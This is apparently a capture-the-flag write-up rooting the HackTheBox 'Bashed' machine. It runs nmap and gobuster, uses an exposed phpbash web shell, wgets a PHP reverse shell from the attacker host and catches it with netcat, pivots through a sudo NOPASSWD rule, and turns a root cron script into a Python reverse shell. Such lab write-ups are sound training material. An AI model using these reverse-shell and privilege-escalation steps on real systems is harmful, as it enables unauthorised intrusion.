In my first article, I'll explain in details of the process of how to gain root access to the "Bashed" machine.
Based on scores of HacktheBox users, we can say that this machine is on the easier side of difficulty level.
As always, at first, we are checking Nmap scanning results:
[email protected]:~# nmap -A -sV 10.10.10.68 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 07:43 GMT Nmap scan report for 10.10.10.68 Host is up (0.14s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Arrexel's Development Site Nmap done: 1 IP address (1 host up) scanned in 29.56 seconds
After fast 1000 port scanning, I started a full port scan of the max (1-65535), so we can recheck to ensure that there aren’t running any service in any ports. By the way, this machine runs web service on port 80 so we can check directories with DirBuster (comes with GUI), GoBuster or dirb. Here, I used gobuster.
When we visit the website, we can access variously related explanations with the development of phpbash. You can access to phpbash. script as well as GitHub link of Arrexel that created for this machine. If you review the code on GitHub, you understand this single phpbash file is a standalone, semi-interactive web shell. Also, this is a fantastic field for an attack. Now, let’s see what we got with GoBuster.
gobuster -u 10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
On gobuster command:
- -x can identify file extension,
- -w can identify the dictionary you want to use.
Depending on GoBuster results, some files and scripts directory can be seen under it such as "/uploads", "/php" , "/dev" folders. In the root directory,we see an index page, and we cannot list files. When we are in “dev” directory, we can list the phpbash.php, and that's what we look for.
First, let’s learn the user and group IDs by running id command. Then, we will check if we have access permission to /home directory to get the user.txt flag.
[email protected]:/var/www/html/dev# id uid=33(www-data) gid=33(www-data) groups=33(www-data) [email protected]:/var/www/html/dev# cd /home [email protected]:/home# ls arrexel scriptmanager [email protected]:/home# cd arrexel [email protected]:/home/arrexel# ls -la total 36 drwxr-xr-x 4 arrexel arrexel 4096 Dec 4 2017 . drwxr-xr-x 4 root root 4096 Dec 4 2017 .. -rw------- 1 arrexel arrexel 1 Dec 23 2017 .bash_history -rw-r--r-- 1 arrexel arrexel 220 Dec 4 2017 .bash_logout -rw-r--r-- 1 arrexel arrexel 3786 Dec 4 2017 .bashrc drwx------ 2 arrexel arrexel 4096 Dec 4 2017 .cache drwxrwxr-x 2 arrexel arrexel 4096 Dec 4 2017 .nano -rw-r--r-- 1 arrexel arrexel 655 Dec 4 2017 .profile -rw-r--r-- 1 arrexel arrexel 0 Dec 4 2017 .sudo_as_admin_successful -r--r--r-- 1 arrexel arrexel 33 Dec 4 2017 user.txt [email protected]:/home/arrexel# cat user.txt JACKPOT. You have found user.txt :)
Before the Privilege Escalation part, let’s try to open a reverse shell besides the web shell. In the following sections, I will explain why it is better to have a reverse shell. First, you can download PHP Tiny Reverse Shell, I have shared on my GitHub.
Don't forget to edit 10.10.10.10 IP and 1234 port in the reverseshell.php file.
While on web shell, www-data has the authorisation to write into /var/www/html/uploads directory. Here, you can write the reverseshell.php file and then, we can call the reverseshell.php file on our browser.
Let’s use our favourite Python module we use almost all the time to send files: SimpleHTTPServer
[email protected]:~/Desktop/bashed# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
Navigate to http://10.10.10.68/dev/phpbash.php
[email protected]:/var/www/html/uploads# wget http://10.10.X.21/reverseshell.php --2019-02-19 00:27:25-- http://10.10.X.21/reverseshell.php Connecting to 10.10.X.21:80... connected. HTTP request sent, awaiting response... 200 OK Length: 72 [application/octet-stream] Saving to: 'reverseshell.php' 0K 100% 14.0M=0s 2019-02-19 00:27:25 (14.0 MB/s) - 'reverseshell.php' saved [72/72]
Let’s set netcat listener in our local as given below.
[email protected]:~/Desktop/bashed# nc -nvlp 1234 listening on [any] 1234 ...
so when you check your nc listener:
[email protected]:~/Desktop/bashed# nc -nvlp 1234 listening on [any] 1234 ... connect to [10.10.X.21] from (UNKNOWN) [10.10.10.68] 37420 bash: cannot set terminal process group (743): Inappropriate ioctl for device bash: no job control in this shell [email protected]:/var/www/html/uploads$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) [email protected]:/var/www/html/uploads$
To work on the shell more easily type:
$ python -c "import pty; pty.spawn('/bin/bash');"
When we get around the root directory, again some files and script directory can be seen under it. One says "Enumerate More..."
[email protected]:/$ ls -la ls -la total 88 drwxr-xr-x 23 root root 4096 Dec 4 2017 . drwxr-xr-x 23 root root 4096 Dec 4 2017 .. drwxr-xr-x 2 root root 4096 Dec 4 2017 bin drwxr-xr-x 3 root root 4096 Dec 4 2017 boot drwxr-xr-x 19 root root 4240 Feb 17 22:14 dev drwxr-xr-x 89 root root 4096 Dec 4 2017 etc drwxr-xr-x 4 root root 4096 Dec 4 2017 home lrwxrwxrwx 1 root root 32 Dec 4 2017 initrd.img -> boot/initrd.img-4.4.0-62-generic drwxr-xr-x 19 root root 4096 Dec 4 2017 lib drwxr-xr-x 2 root root 4096 Dec 4 2017 lib64 drwx------ 2 root root 16384 Dec 4 2017 lost+found drwxr-xr-x 4 root root 4096 Dec 4 2017 media drwxr-xr-x 2 root root 4096 Feb 15 2017 mnt drwxr-xr-x 2 root root 4096 Dec 4 2017 opt dr-xr-xr-x 121 root root 0 Feb 17 22:14 proc drwx------ 3 root root 4096 Dec 4 2017 root drwxr-xr-x 18 root root 520 Feb 18 06:25 run drwxr-xr-x 2 root root 4096 Dec 4 2017 sbin drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 scripts drwxr-xr-x 2 root root 4096 Feb 15 2017 srv dr-xr-xr-x 13 root root 0 Feb 17 22:14 sys drwxrwxrwt 10 root root 4096 Feb 19 00:48 tmp drwxr-xr-x 10 root root 4096 Dec 4 2017 usr drwxr-xr-x 12 root root 4096 Dec 4 2017 var lrwxrwxrwx 1 root root 29 Dec 4 2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic [email protected]:/$ cd scrpits cd scrpits bash: cd: scrpits: No such file or directory [email protected]:/$ cd scripts cd scripts bash: cd: scripts: Permission denied [email protected]:/$ ls -la scripts ls -la scripts ls: cannot access 'scripts/..': Permission denied ls: cannot access 'scripts/test.py': Permission denied ls: cannot access 'scripts/test.txt': Permission denied ls: cannot access 'scripts/.': Permission denied total 0 d????????? ? ? ? ? ? . d????????? ? ? ? ? ? .. -????????? ? ? ? ? ? test.py -????????? ? ? ? ? ? test.txt
Well Well Well, we have an interesting directory here: "/scripts" directory and scriptmanager as the owner. Since we have read-only authorisation with the www-data user, at least we can list files in the directory.
[email protected]:/$ sudo -l sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL
We can see that www-data user can run any commands as scriptmanager.
[email protected]:/$ sudo -u scriptmanager /bin/bash sudo -u scriptmanager /bin/bash [email protected]:/$
Let’s get back to "/scripts" directory.
[email protected]:/scripts$ ls -la ls -la total 16 drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 . drwxr-xr-x 23 root root 4096 Dec 4 2017 .. -rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py -rw-r--r-- 1 root root 12 Feb 19 01:58 test.txt [email protected]:/scripts$ cat test.py cat test.py f = open("test.txt", "w") f.write("testing 123!") f.close [email protected]:/scripts$ cat test.txt cat test.txt testing [email protected]:/scripts$
As it can be seen, when we run test.py, content of test.txt files are printed as they are in script. The important thing is that test.txt file is controlled by root, but the owner of test.py is scriptmanager. In other words, the test.txt file changes every minute. This way, it is highly possible that a cron job-style structure triggers this file and owned by root. You can access to the root.txt flag by editing test.py script or get a reverse shell with netcat.
You can use Python reverse shell from pentestmonkey. Let’s edit test.py file and change IP and PORT to your own. Link.
Set up your netcat listener:
[email protected]:~# nc -lnvp 1453 listening on [any] 1453 ... connect to [10.10.x.21] from (UNKNOWN) [10.10.10.68] 50176 /bin/sh: 0: can’t access tty; job control turned off # whoami root